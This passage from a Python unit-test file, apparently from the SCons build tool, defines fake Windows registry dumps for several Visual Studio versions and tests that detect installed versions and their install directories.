[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\6.0\Setup\Microsoft Visual C++]
"ProductDir"="C:\Program Files\Microsoft Visual Studio\VC98"
'''.split('\n')
# Registry-dump fixture: full Visual Studio 6.0 install under C:\VS6 (SP5).
# str.split replaces the deprecated string.split module function (identical
# result, Python 3 compatible); fixture text unchanged.
regdata_6b = r'''[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio]
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\6.0]
"InstallDir"="C:\VS6\Common\IDE\IDE98"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\6.0\ServicePacks]
"sp5"=""
"latest"=dword:00000005
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\6.0\Setup]
"VsCommonDir"="C:\VS6\Common"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\6.0\Setup\Microsoft Visual Basic]
"ProductDir"="C:\VS6\VB98"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\6.0\Setup\Microsoft Visual C++]
"ProductDir"="C:\VS6\VC98"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\6.0\Setup\Microsoft Visual Studio]
"ProductDir"="C:\VS6"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\6.0\Setup\Microsoft VSEE Client]
"ProductDir"="C:\VS6\Common\Tools"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\6.0\Setup\Visual Studio 98]
'''.split('\n')
# Registry-dump fixture: Visual Studio .NET (7.0) Professional.
# str.split replaces the deprecated string.split module function (identical
# result, Python 3 compatible); fixture text unchanged.  The leading newline
# inside the raw string keeps the first list element as '' exactly as before.
regdata_7 = r'''
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0]
"InstallDir"="C:\Program Files\Microsoft Visual Studio .NET\Common7\IDE\"
"Source Directories"="C:\Program Files\Microsoft Visual Studio .NET\Vc7\crt\;C:\Program Files\Microsoft Visual Studio .NET\Vc7\atlmfc\src\mfc\;C:\Program Files\Microsoft Visual Studio .NET\Vc7\atlmfc\src\atl\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\InstalledProducts]
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\InstalledProducts\CrystalReports]
@="#15007"
"Package"="{F05E92C6-8346-11D3-B4AD-00A0C9B04E7B}"
"ProductDetails"="#15009"
"LogoID"="0"
"PID"="#15008"
"UseInterface"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\InstalledProducts\Visual Basic.NET]
@=""
"DefaultProductAttribute"="VB"
"Package"="{164B10B9-B200-11D0-8C61-00A0C91E29D5}"
"UseInterface"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\InstalledProducts\Visual C#]
@=""
"Package"="{FAE04EC1-301F-11d3-BF4B-00C04F79EFBC}"
"UseInterface"=dword:00000001
"DefaultProductAttribute"="C#"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\InstalledProducts\VisualC++]
"UseInterface"=dword:00000001
"Package"="{F1C25864-3097-11D2-A5C5-00C04F7968B4}"
"DefaultProductAttribute"="VC"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\Setup]
"Dbghelp_path"="C:\Program Files\Microsoft Visual Studio .NET\Common7\IDE\"
"dw_dir"="C:\Program Files\Microsoft Visual Studio .NET\Common7\IDE\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\Setup\MSDN]
"ProductDir"="C:\Program Files\Microsoft Visual Studio .NET\Msdn\1033\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\Setup\Servicing\SKU]
"Visual Studio .NET Professional - English"="{D0610409-7D65-11D5-A54F-0090278A1BB8}"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\Setup\VB]
"ProductDir"="C:\Program Files\Microsoft Visual Studio .NET\Vb7\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\Setup\VC]
"ProductDir"="C:\Program Files\Microsoft Visual Studio .NET\Vc7\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\Setup\VC#]
"ProductDir"="C:\Program Files\Microsoft Visual Studio .NET\VC#\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\Setup\Visual Studio .NET Professional - English]
"InstallSuccess"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\Setup\VS]
"EnvironmentDirectory"="C:\Program Files\Microsoft Visual Studio .NET\Common7\IDE\"
"EnvironmentPath"="C:\Program Files\Microsoft Visual Studio .NET\Common7\IDE\devenv.exe"
"VS7EnvironmentLocation"="C:\Program Files\Microsoft Visual Studio .NET\Common7\IDE\devenv.exe"
"MSMDir"="C:\Program Files\Common Files\Merge Modules\"
"ProductDir"="C:\Program Files\Microsoft Visual Studio .NET\"
"VS7CommonBinDir"="C:\Program Files\Microsoft Visual Studio .NET\Common7\Tools\"
"VS7CommonDir"="C:\Program Files\Microsoft Visual Studio .NET\Common7\"
"VSUpdateDir"="C:\Program Files\Microsoft Visual Studio .NET\Setup\VSUpdate\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\Setup\VS\BuildNumber]
"1033"="7.0.9466"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\Setup\VS\Pro]
"ProductDir"="C:\Program Files\Microsoft Visual Studio .NET\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\VC]
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\VC\VC_OBJECTS_PLATFORM_INFO]
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\VC\VC_OBJECTS_PLATFORM_INFO\Win32]
@="{A54AAE91-30C2-11D3-87BF-A04A4CC10000}"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.0\VC\VC_OBJECTS_PLATFORM_INFO\Win32\Directories]
"Path Dirs"="$(VCInstallDir)bin;$(VSInstallDir)Common7\Tools\bin\prerelease;$(VSInstallDir)Common7\Tools\bin;$(VSInstallDir)Common7\tools;$(VSInstallDir)Common7\ide;C:\Program Files\HTML Help Workshop\;$(FrameworkSDKDir)bin;$(FrameworkDir)$(FrameworkVersion);C:\perl\bin;C:\cygwin\bin;c:\cygwin\usr\bin;C:\bin;C:\program files\perforce;C:\cygwin\usr\local\bin\i686-pc-cygwin;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem"
"Library Dirs"="$(VCInstallDir)lib;$(VCInstallDir)atlmfc\lib;$(VCInstallDir)PlatformSDK\lib\prerelease;$(VCInstallDir)PlatformSDK\lib;$(FrameworkSDKDir)lib"
"Include Dirs"="$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(VCInstallDir)PlatformSDK\include\prerelease;$(VCInstallDir)PlatformSDK\include;$(FrameworkSDKDir)include"
"Source Dirs"="$(VCInstallDir)atlmfc\src\mfc;$(VCInstallDir)atlmfc\src\atl;$(VCInstallDir)crt\src"
"Reference Dirs"=""
'''.split('\n')
# Registry-dump fixture: Visual Studio .NET 2003 (7.1) Professional.
# str.split replaces the deprecated string.split module function (identical
# result, Python 3 compatible); fixture text unchanged.  The leading newline
# inside the raw string keeps the first list element as '' exactly as before.
regdata_7_1 = r'''
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1]
@=""
"Source Directories"="C:\Program Files\Microsoft Visual Studio .NET 2003\Vc7\crt\src\;C:\Program Files\Microsoft Visual Studio .NET 2003\Vc7\atlmfc\src\mfc\;C:\Program Files\Microsoft Visual Studio .NET 2003\Vc7\atlmfc\src\atl\"
"ThisVersionSolutionCLSID"="{246C57AE-40DD-4d6b-9E8D-B0F5757BB2A8}"
"ThisVersionDTECLSID"="{8CD2DD97-4EC1-4bc4-9359-89A3EEDD57A6}"
"InstallDir"="C:\Program Files\Microsoft Visual Studio .NET 2003\Common7\IDE\"
"CLR Version"="v1.1.4322"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\InstalledProducts]
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\InstalledProducts\Smart Device Extensions]
"UseInterface"=dword:00000001
"VS7InstallDir"="C:\Program Files\Microsoft Visual Studio .NET 2003\"
"VBDeviceInstallDir"="C:\Program Files\Microsoft Visual Studio .NET 2003\VB7\"
"CSharpDeviceInstallDir"="C:\Program Files\Microsoft Visual Studio .NET 2003\VC#\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\InstalledProducts\Visual Basic.NET]
"UseInterface"=dword:00000001
"Package"="{164B10B9-B200-11D0-8C61-00A0C91E29D5}"
"DefaultProductAttribute"="VB"
@=""
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\InstalledProducts\Visual C#]
"DefaultProductAttribute"="C#"
"UseInterface"=dword:00000001
"Package"="{FAE04EC1-301F-11D3-BF4B-00C04F79EFBC}"
@=""
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\InstalledProducts\Visual JSharp]
@=""
"Package"="{E6FDF8B0-F3D1-11D4-8576-0002A516ECE8}"
"UseInterface"=dword:00000001
"DefaultProductAttribute"="Visual JSharp"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\InstalledProducts\VisualC++]
"UseInterface"=dword:00000001
"Package"="{F1C25864-3097-11D2-A5C5-00C04F7968B4}"
"DefaultProductAttribute"="VC"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\Setup]
"Dbghelp_path"="C:\Program Files\Microsoft Visual Studio .NET 2003\Common7\IDE\"
"dw_dir"="C:\Program Files\Microsoft Visual Studio .NET 2003\Common7\IDE\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\Setup\CSDPROJ]
"ProductDir"="C:\Program Files\Microsoft Visual Studio .NET 2003\VC#\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\Setup\JSHPROJ]
"ProductDir"="C:\Program Files\Microsoft Visual Studio .NET 2003\VJ#\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\Setup\Servicing]
"CurrentSULevel"=dword:00000000
"CurrentSPLevel"=dword:00000000
"Server Path"=""
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\Setup\Servicing\Package]
"FxSDK"=""
"VB"=""
"VC"=""
"VCS"=""
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\Setup\Servicing\SKU]
"Visual Studio .NET Professional 2003 - English"="{20610409-CA18-41A6-9E21-A93AE82EE7C5}"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\Setup\VB]
"ProductDir"="C:\Program Files\Microsoft Visual Studio .NET 2003\Vb7\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\Setup\VBDPROJ]
"ProductDir"="C:\Program Files\Microsoft Visual Studio .NET 2003\Vb7\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\Setup\VC]
"ProductDir"="C:\Program Files\Microsoft Visual Studio .NET 2003\Vc7\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\Setup\VC#]
"ProductDir"="C:\Program Files\Microsoft Visual Studio .NET 2003\VC#\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\Setup\Visual Studio .NET Professional 2003 - English]
"InstallSuccess"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\Setup\VS]
"EnvironmentDirectory"="C:\Program Files\Microsoft Visual Studio .NET 2003\Common7\IDE\"
"EnvironmentPath"="C:\Program Files\Microsoft Visual Studio .NET 2003\Common7\IDE\devenv.exe"
"VS7EnvironmentLocation"="C:\Program Files\Microsoft Visual Studio .NET 2003\Common7\IDE\devenv.exe"
"MSMDir"="C:\Program Files\Common Files\Merge Modules\"
"VS7CommonBinDir"="C:\Program Files\Microsoft Visual Studio .NET 2003\Common7\Tools\"
"VS7CommonDir"="C:\Program Files\Microsoft Visual Studio .NET 2003\Common7\"
"ProductDir"="C:\Program Files\Microsoft Visual Studio .NET 2003\"
"VSUpdateDir"="C:\Program Files\Microsoft Visual Studio .NET 2003\Setup\VSUpdate\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\Setup\VS\BuildNumber]
"1033"="7.1.3088"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\Setup\VS\Pro]
"ProductDir"="C:\Program Files\Microsoft Visual Studio .NET 2003\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\VC]
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\VC\VC_OBJECTS_PLATFORM_INFO]
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\VC\VC_OBJECTS_PLATFORM_INFO\Win32]
@="{759354D0-6B42-4705-AFFB-56E34D2BC3D4}"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\VC\VC_OBJECTS_PLATFORM_INFO\Win32\Directories]
"Path Dirs"="$(VCInstallDir)bin;$(VSInstallDir)Common7\Tools\bin\prerelease;$(VSInstallDir)Common7\Tools\bin;$(VSInstallDir)Common7\tools;$(VSInstallDir)Common7\ide;C:\Program Files\HTML Help Workshop\;$(FrameworkSDKDir)bin;$(FrameworkDir)$(FrameworkVersion);C:\Perl\bin\;c:\bin;c:\cygwin\bin;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\Program Files\Common Files\Avid;C:\Program Files\backburner 2\;C:\Program Files\cvsnt;C:\Program Files\Subversion\bin;C:\Program Files\Common Files\Adobe\AGL;C:\Program Files\HTMLDoc"
"Library Dirs"="$(VCInstallDir)lib;$(VCInstallDir)atlmfc\lib;$(VCInstallDir)PlatformSDK\lib\prerelease;$(VCInstallDir)PlatformSDK\lib;$(FrameworkSDKDir)lib"
"Include Dirs"="$(VCInstallDir)include;$(VCInstallDir)atlmfc\include;$(VCInstallDir)PlatformSDK\include\prerelease;$(VCInstallDir)PlatformSDK\include;$(FrameworkSDKDir)include"
"Source Dirs"="$(VCInstallDir)atlmfc\src\mfc;$(VCInstallDir)atlmfc\src\atl;$(VCInstallDir)crt\src"
"Reference Dirs"="$(FrameWorkDir)$(FrameWorkVersion)"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VisualStudio\7.1\VC\VC_OBJECTS_PLATFORM_INFO\Win32\ToolDefaultExtensionLists]
"VCCLCompilerTool"="*.cpp;*.cxx;*.cc;*.c"
"VCLinkerTool"="*.obj;*.res;*.lib;*.rsc"
"VCLibrarianTool"="*.obj;*.res;*.lib;*.rsc"
"VCMIDLTool"="*.idl;*.odl"
"VCCustomBuildTool"="*.bat"
"VCResourceCompilerTool"="*.rc"
"VCPreBuildEventTool"="*.bat"
"VCPreLinkEventTool"="*.bat"
"VCPostBuildEventTool"="*.bat"
"VCBscMakeTool"="*.sbr"
"VCNMakeTool"=""
"VCWebServiceProxyGeneratorTool"="*.discomap"
"VCWebDeploymentTool"=""
"VCALinkTool"="*.resources"
"VCManagedResourceCompilerTool"="*.resx"
"VCXMLDataGeneratorTool"="*.xsd"
"VCManagedWrapperGeneratorTool"=""
"VCAuxiliaryManagedWrapperGeneratorTool"=""
"VCPrimaryInteropTool"=""
'''.split('\n')
# Registry dump for a Visual C++ 2005 Express installation, split into lines.
# str.split works on both Python 2 and 3; string.split() was removed in Python 3.
regdata_8exp = r'''
[HKEY_LOCAL_MACHINE\Software\Microsoft\VCExpress\8.0]
"CLR Version"="v2.0.50727"
"ApplicationID"="VCExpress"
"SecurityAppID"="{741726F6-1EAE-4680-86A6-6085E8872CF8}"
"InstallDir"="C:\Program Files\Microsoft Visual Studio 8\Common7\IDE\"
"EnablePreloadCLR"=dword:00000001
"RestoreAppPath"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\VCExpress\8.0\InstalledProducts]
[HKEY_LOCAL_MACHINE\Software\Microsoft\VCExpress\8.0\InstalledProducts\Microsoft Visual C++]
"UseInterface"=dword:00000001
"Package"="{F1C25864-3097-11D2-A5C5-00C04F7968B4}"
"DefaultProductAttribute"="VC"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VCExpress\8.0\Setup]
[HKEY_LOCAL_MACHINE\Software\Microsoft\VCExpress\8.0\Setup\VC]
"ProductDir"="C:\Program Files\Microsoft Visual Studio 8\VC\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VCExpress\8.0\Setup\VS]
"ProductDir"="C:\Program Files\Microsoft Visual Studio 8\"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VCExpress\8.0\VC]
[HKEY_LOCAL_MACHINE\Software\Microsoft\VCExpress\8.0\VC\VC_OBJECTS_PLATFORM_INFO]
[HKEY_LOCAL_MACHINE\Software\Microsoft\VCExpress\8.0\VC\VC_OBJECTS_PLATFORM_INFO\Win32]
@="{72f11281-2429-11d7-8bf6-00b0d03daa06}"
[HKEY_LOCAL_MACHINE\Software\Microsoft\VCExpress\8.0\VC\VC_OBJECTS_PLATFORM_INFO\Win32\ToolDefaultExtensionLists]
"VCCLCompilerTool"="*.cpp;*.cxx;*.cc;*.c"
"VCLinkerTool"="*.obj;*.res;*.lib;*.rsc;*.licenses"
"VCLibrarianTool"="*.obj;*.res;*.lib;*.rsc"
"VCMIDLTool"="*.idl;*.odl"
"VCCustomBuildTool"="*.bat"
"VCResourceCompilerTool"="*.rc"
"VCPreBuildEventTool"="*.bat"
"VCPreLinkEventTool"="*.bat"
"VCPostBuildEventTool"="*.bat"
"VCBscMakeTool"="*.sbr"
"VCFxCopTool"="*.dll;*.exe"
"VCNMakeTool"=""
"VCWebServiceProxyGeneratorTool"="*.discomap"
"VCWebDeploymentTool"=""
"VCALinkTool"="*.resources"
"VCManagedResourceCompilerTool"="*.resx"
"VCXMLDataGeneratorTool"="*.xsd"
"VCManifestTool"="*.manifest"
"VCXDCMakeTool"="*.xdc"
'''.split('\n')
# Registry dump of the Windows CurrentVersion key (shared by every scenario).
# str.split works on both Python 2 and 3; string.split() was removed in Python 3.
regdata_cv = r'''[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion]
"ProgramFilesDir"="C:\Program Files"
"CommonFilesDir"="C:\Program Files\Common Files"
"MediaPath"="C:\WINDOWS\Media"
'''.split('\n')
# Registry dump for a machine with no Visual Studio installed at all.
regdata_none = []
class DummyEnv:
    """Minimal stand-in for an SCons construction environment.

    Backed by a plain dict; exposes the small subset of the Environment API
    that the MSVS detection code uses.
    """
    def __init__(self, dict=None):
        # The parameter is kept named 'dict' (shadowing the builtin) for
        # backward compatibility with existing callers.
        if dict:
            self.dict = dict
        else:
            self.dict = {}
    def Dictionary(self, key = None):
        """Return the whole dict, or the value stored under *key*."""
        if not key:
            return self.dict
        return self.dict[key]
    def __setitem__(self,key,value):
        self.dict[key] = value
    def __getitem__(self,key):
        return self.dict[key]
    def has_key(self,name):
        # 'in' is the idiom and works on both Python 2 and 3;
        # dict.has_key() exists only on Python 2.
        return name in self.dict
class RegKey:
    """Thin wrapper recording an 'open' dummy-registry key handle."""
    def __init__(self, key):
        self.key = key
class RegNode:
    """Node in the dummy registry: named values plus child keys.

    Both values and child keys are kept in insertion order (the *array
    attributes) so index-based enumeration matches the order the dump
    was parsed in.
    """
    def __init__(self,name):
        self.valdict = {}
        self.keydict = {}
        self.keyarray = []   # child-key names, insertion order
        self.valarray = []   # value names, insertion order
        self.name = name
    def value(self,val):
        """Return (data, 1) for the named value, or raise RegError."""
        # 'in' replaces Python-2-only dict.has_key().
        if val in self.valdict:
            return (self.valdict[val],1)
        else:
            raise SCons.Util.RegError
    def addValue(self,name,val):
        """Store *val* under *name*, remembering insertion order."""
        self.valdict[name] = val
        self.valarray.append(name)
    def valindex(self,index):
        """Return (name, data, 1) for the index-th value, or raise RegError."""
        rv = None
        try:
            rv = (self.valarray[index],self.valdict[self.valarray[index]],1)
        except (IndexError, KeyError):
            # An out-of-range index raises IndexError, not KeyError; both must
            # surface as RegError so enumeration loops terminate correctly.
            raise SCons.Util.RegError
        return rv
    def key(self,key,sep = '\\'):
        """Look up a (possibly sep-separated) subkey path; raise RegError if absent."""
        if key.find(sep) != -1:
            keyname, subkeys = key.split(sep,1)
        else:
            keyname = key
            subkeys = ""
        try:
            # recurse, and return the lowest level key node
            if subkeys:
                return self.keydict[keyname].key(subkeys)
            else:
                return self.keydict[keyname]
        except KeyError:
            raise SCons.Util.RegError
    def addKey(self,name,sep = '\\'):
        """Create (if needed) and return the node for a sep-separated key path."""
        # str methods replace the Python-2-only string.find()/string.split(),
        # matching the style already used in key() above.
        if name.find(sep) != -1:
            keyname, subkeys = name.split(sep, 1)
        else:
            keyname = name
            subkeys = ""
        if keyname not in self.keydict:
            self.keydict[keyname] = RegNode(keyname)
            self.keyarray.append(keyname)
        # recurse, and return the lowest level key node
        if subkeys:
            return self.keydict[keyname].addKey(subkeys)
        else:
            return self.keydict[keyname]
    def keyindex(self,index):
        """Return the index-th child key node."""
        return self.keydict[self.keyarray[index]]
    def __str__(self):
        return self._doStr()
    def _doStr(self, indent = ''):
        """Recursively render values and subkeys as an indented text tree."""
        rv = ""
        for value in self.valarray:
            rv = rv + '%s"%s" = "%s"\n' % (indent, value, self.valdict[value])
        for key in self.keyarray:
            rv = rv + "%s%s: {\n"%(indent, key)
            rv = rv + self.keydict[key]._doStr(indent + ' ')
            rv = rv + indent + '}\n'
        return rv
class DummyRegistry:
    """Fake Windows registry built from a .reg-style text dump."""
    def __init__(self,data):
        """Create the four standard root hives, then load *data* into them."""
        self.root = RegNode('REGISTRY')
        for hive in ('HKEY_LOCAL_MACHINE',
                     'HKEY_CURRENT_USER',
                     'HKEY_USERS',
                     'HKEY_CLASSES_ROOT'):
            self.root.addKey(hive)
        self.parse(data)
    def parse(self, data):
        """Walk the dump: '[key]' lines open a key, '"name"="value"' lines add values."""
        parent = self.root
        keymatch = re.compile('^\[(.*)\]$')
        valmatch = re.compile('^(?:"(.*)"|[@])="(.*)"$')
        for line in data:
            keyhit = keymatch.match(line)
            if keyhit:
                # add a key, set it to current parent
                parent = self.root.addKey(keyhit.group(1))
                continue
            valhit = valmatch.match(line)
            if valhit:
                parent.addValue(valhit.group(1), valhit.group(2))
    def OpenKeyEx(self,root,key):
        """Resolve a SCons.Util HKEY_* constant plus subkey path to a RegNode."""
        if root == SCons.Util.HKEY_CLASSES_ROOT:
            mykey = 'HKEY_CLASSES_ROOT\\' + key
        elif root == SCons.Util.HKEY_USERS:
            mykey = 'HKEY_USERS\\' + key
        elif root == SCons.Util.HKEY_CURRENT_USER:
            mykey = 'HKEY_CURRENT_USER\\' + key
        elif root == SCons.Util.HKEY_LOCAL_MACHINE:
            mykey = 'HKEY_LOCAL_MACHINE\\' + key
        return self.root.key(mykey)
def DummyOpenKeyEx(root, key):
    """Stand-in for SCons.Util.RegOpenKeyEx, backed by the module-global registry."""
    return registry.OpenKeyEx(root, key)
def DummyEnumKey(key, index):
    """Stand-in for SCons.Util.RegEnumKey; RegError signals the end of enumeration."""
    try:
        return key.keyarray[index]
    except IndexError:
        raise SCons.Util.RegError
def DummyEnumValue(key, index):
    """Stand-in for SCons.Util.RegEnumValue; delegates to the node's valindex()."""
    return key.valindex(index)
def DummyQueryValue(key, value):
    """Stand-in for SCons.Util.RegQueryValueEx; delegates to the node's value()."""
    return key.value(value)
def DummyExists(path):
    """Stand-in for os.path.exists that claims every path exists."""
    return 1
class msvsTestCase(unittest.TestCase):
    """Common checks run against each fake-registry scenario.

    Concrete subclasses supply: registry, default_version, highest_version,
    number_of_versions, install_locs and default_install_loc.
    """
    def setUp(self):
        # Point the module-global registry (consulted by DummyOpenKeyEx)
        # at this scenario's dump.
        global registry
        registry = self.registry
    def test_get_default_visual_studio_version(self):
        """Test retrieval of the default visual studio version"""
        # Fresh environment: the default version is detected and cached.
        env = DummyEnv()
        v1 = get_default_visualstudio_version(env)
        assert env['MSVS_VERSION'] == self.default_version, env['MSVS_VERSION']
        assert env['MSVS']['VERSION'] == self.default_version, env['MSVS']['VERSION']
        assert v1 == self.default_version, v1
        # An explicit MSVS_VERSION in the environment must win over detection.
        env = DummyEnv({'MSVS_VERSION':'7.0'})
        v2 = get_default_visualstudio_version(env)
        assert env['MSVS_VERSION'] == '7.0', env['MSVS_VERSION']
        assert env['MSVS']['VERSION'] == '7.0', env['MSVS']['VERSION']
        assert v2 == '7.0', v2
        # Overriding after a first detection must also be honored.
        env = DummyEnv()
        v3 = get_default_visualstudio_version(env)
        if v3 == '7.1':
            override = '7.0'
        else:
            override = '7.1'
        env['MSVS_VERSION'] = override
        v3 = get_default_visualstudio_version(env)
        assert env['MSVS_VERSION'] == override, env['MSVS_VERSION']
        assert env['MSVS']['VERSION'] == override, env['MSVS']['VERSION']
        assert v3 == override, v3
    def test_get_visual_studio_versions(self):
        """Test retrieval of the list of visual studio versions"""
        v1 = get_visualstudio_versions()
        # v1 may be empty (no installs); otherwise highest version comes first.
        assert not v1 or v1[0] == self.highest_version, v1
        assert len(v1) == self.number_of_versions, v1
    def test_get_msvs_install_dirs(self):
        """Test retrieval of the list of visual studio installed locations"""
        v1 = get_msvs_install_dirs()
        assert v1 == self.default_install_loc, v1
        for key, loc in self.install_locs.items():
            v2 = get_msvs_install_dirs(key)
            assert v2 == loc, key + ': ' + str(v2)
class msvs6aTestCase(msvsTestCase):
    """Test MSVS 6 Registry"""
    # Expectations for a default-location Visual Studio 6 installation.
    registry = DummyRegistry(regdata_6a + regdata_cv)
    default_version = '6.0'
    highest_version = '6.0'
    number_of_versions = 1
    install_locs = {
        '6.0' : {'VSINSTALLDIR': 'C:\\Program Files\\Microsoft Visual Studio', 'VCINSTALLDIR': 'C:\\Program Files\\Microsoft Visual Studio\\VC98'},
        '7.0' : {},
        '7.1' : {},
        '8.0' : {},
        '8.0Exp' : {},
    }
    default_install_loc = install_locs['6.0']
class msvs6bTestCase(msvsTestCase):
    """Test Other MSVS 6 Registry"""
    # Same as msvs6a, but with VS6 installed in a non-default directory.
    registry = DummyRegistry(regdata_6b + regdata_cv)
    default_version = '6.0'
    highest_version = '6.0'
    number_of_versions = 1
    install_locs = {
        '6.0' : {'VSINSTALLDIR': 'C:\\VS6', 'VCINSTALLDIR': 'C:\\VS6\\VC98'},
        '7.0' : {},
        '7.1' : {},
        '8.0' : {},
        '8.0Exp' : {},
    }
    default_install_loc = install_locs['6.0']
class msvs6and7TestCase(msvsTestCase):
    """Test MSVS 6 & 7 Registry"""
    # Side-by-side VS6 and VS.NET 2002 install; 7.0 is the newer default.
    registry = DummyRegistry(regdata_6b + regdata_7 + regdata_cv)
    default_version = '7.0'
    highest_version = '7.0'
    number_of_versions = 2
    install_locs = {
        '6.0' : {'VSINSTALLDIR': 'C:\\VS6', 'VCINSTALLDIR': 'C:\\VS6\\VC98'},
        '7.0' : {'VSINSTALLDIR': 'C:\\Program Files\\Microsoft Visual Studio .NET\\', 'VCINSTALLDIR': 'C:\\Program Files\\Microsoft Visual Studio .NET\\Vc7\\'},
        '7.1' : {},
        '8.0' : {},
        '8.0Exp' : {},
    }
    default_install_loc = install_locs['7.0']
class msvs7TestCase(msvsTestCase):
    """Test MSVS 7 Registry"""
    # VS.NET 2002 only; the 6.0 entry falls back to the guessed default dir.
    registry = DummyRegistry(regdata_7 + regdata_cv)
    default_version = '7.0'
    highest_version = '7.0'
    number_of_versions = 1
    install_locs = {
        '6.0' : {'VSINSTALLDIR': 'C:\\Program Files\\Microsoft Visual Studio'},
        '7.0' : {'VSINSTALLDIR': 'C:\\Program Files\\Microsoft Visual Studio .NET\\', 'VCINSTALLDIR': 'C:\\Program Files\\Microsoft Visual Studio .NET\\Vc7\\'},
        '7.1' : {},
        '8.0' : {},
        '8.0Exp' : {},
    }
    default_install_loc = install_locs['7.0']
class msvs71TestCase(msvsTestCase):
    """Test MSVS 7.1 Registry"""
    # VS.NET 2003 only.
    registry = DummyRegistry(regdata_7_1 + regdata_cv)
    default_version = '7.1'
    highest_version = '7.1'
    number_of_versions = 1
    install_locs = {
        '6.0' : {'VSINSTALLDIR': 'C:\\Program Files\\Microsoft Visual Studio'},
        '7.0' : {},
        '7.1' : {'VSINSTALLDIR': 'C:\\Program Files\\Microsoft Visual Studio .NET 2003\\', 'VCINSTALLDIR': 'C:\\Program Files\\Microsoft Visual Studio .NET 2003\\Vc7\\'},
        '8.0' : {},
        '8.0Exp' : {},
    }
    default_install_loc = install_locs['7.1']
class msvs8ExpTestCase(msvsTestCase):
    """Test MSVS 8 Express Registry"""
    # VC++ 2005 Express only; both '8.0' and '8.0Exp' resolve to the same dirs.
    registry = DummyRegistry(regdata_8exp + regdata_cv)
    default_version = '8.0Exp'
    highest_version = '8.0Exp'
    number_of_versions = 1
    install_locs = {
        '6.0' : {'VSINSTALLDIR': 'C:\\Program Files\\Microsoft Visual Studio'},
        '7.0' : {},
        '7.1' : {},
        '8.0' : {'VSINSTALLDIR': 'C:\\Program Files\\Microsoft Visual Studio 8\\', 'VCINSTALLDIR': 'C:\\Program Files\\Microsoft Visual Studio 8\\VC\\'},
